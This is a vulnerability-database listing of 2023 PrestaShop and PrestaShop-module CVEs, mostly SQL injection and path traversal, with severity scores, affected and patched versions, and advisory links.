CVSS: 10.0EPSS: 6%CPEs: 3EXPL: 1CVE-2023-39526 – PrestaShopSQL manager vulnerability (potential RCE)
https://notcve.org/view.php?id=CVE-2023-39526
07 Aug 2023 — PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to remote code execution through SQL injection and arbitrary file write in the back office. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds. • https://github.com/dnkhack/fixcve2023_39526_2023_39527 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 9.4EPSS: 2%CPEs: 1EXPL: 0CVE-2023-39525 – PrestaShop vulnerable to path traversal
https://notcve.org/view.php?id=CVE-2023-39525
07 Aug 2023 — PrestaShop is an open source e-commerce web application. Prior to version 8.1.1, in the back office, files can be compromised using path traversal by replaying the import file deletion query with a specified file path that uses the traversal path. Version 8.1.1 contains a patch for this issue. There are no known workarounds. • https://github.com/PrestaShop/PrestaShop/commit/c7c9a5110421bb2856f4d312ecce192d079b5ec7 • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 0CVE-2023-39524 – PrestaShop vulnerable to boolean SQL injection in search product in BO
https://notcve.org/view.php?id=CVE-2023-39524
07 Aug 2023 — PrestaShop is an open source e-commerce web application. Prior to version 8.1.1, SQL injection possible in the product search field, in BO's product page. Version 8.1.1 contains a patch for this issue. There are no known workarounds. • https://github.com/PrestaShop/PrestaShop/commit/2047d4c053043102bc46a37d383b392704bf14d7 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 5.3EPSS: 0%CPEs: 1EXPL: 0CVE-2023-33777
https://notcve.org/view.php?id=CVE-2023-33777
25 Jul 2023 — An issue in /functions/fbaorder.php of Prestashop amazon before v5.2.24 allows attackers to execute a directory traversal attack. • https://addons.prestashop.com/fr/marketplace/2501-amazon-market-place.html • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-30153
https://notcve.org/view.php?id=CVE-2023-30153
18 Jul 2023 — An SQL injection vulnerability in the Payplug (payplug) module for PrestaShop, in versions 3.6.0, 3.6.1, 3.6.2, 3.6.3, 3.7.0 and 3.7.1, allows remote attackers to execute arbitrary SQL commands via the ajax.php front controller. • https://addons.prestashop.com/en/payment-card-wallet/8795--payplug-accept-customer-payments-wherever-they-are.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 10.0EPSS: 1%CPEs: 1EXPL: 1CVE-2023-30151
https://notcve.org/view.php?id=CVE-2023-30151
13 Jul 2023 — A SQL injection vulnerability in the Boxtal (envoimoinscher) module for PrestaShop, after version 3.1.10, allows remote attackers to execute arbitrary SQL commands via the `key` GET parameter. • https://addons.prestashop.com/en/shipping-carriers/1755-boxtal-connect-turnkey-shipping-solution.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-31672
https://notcve.org/view.php?id=CVE-2023-31672
15 Jun 2023 — In the PrestaShop < 2.4.3 module "Length, weight or volume sell" (ailinear) there is a SQL injection vulnerability. Se ha descubierto una vulnerabilidad de inyección SQL en las versiones de PrestaShop anteriores a v2.4.3 en el módulo "Length, weight or volume sell". • https://friends-of-presta.github.io/security-advisories/modules/2023/06/15/ailinear.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 10.0EPSS: 0%CPEs: 5EXPL: 1CVE-2023-30149
https://notcve.org/view.php?id=CVE-2023-30149
02 Jun 2023 — SQL injection vulnerability in the City Autocomplete (cityautocomplete) module from ebewe.net for PrestaShop, prior to version 1.8.12 (for PrestaShop version 1.5/1.6) or prior to 2.0.3 (for PrestaShop version 1.7), allows remote attackers to execute arbitrary SQL commands via the type, input_name. or q parameter in the autocompletion.php front controller. • https://addons.prestashop.com/fr/inscription-processus-de-commande/6097-city-autocomplete.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-30192
https://notcve.org/view.php?id=CVE-2023-30192
11 May 2023 — Prestashop possearchproducts 1.7 is vulnerable to SQL Injection via PosSearch::find(). • https://friends-of-presta.github.io/security-advisories/modules/2023/05/11/possearchproducts.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-30194
https://notcve.org/view.php?id=CVE-2023-30194
10 May 2023 — Prestashop posstaticfooter <= 1.0.0 is vulnerable to SQL Injection via posstaticfooter::getPosCurrentHook(). • https://friends-of-presta.github.io/security-advisories/modules/2023/05/09/posstaticfooter.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •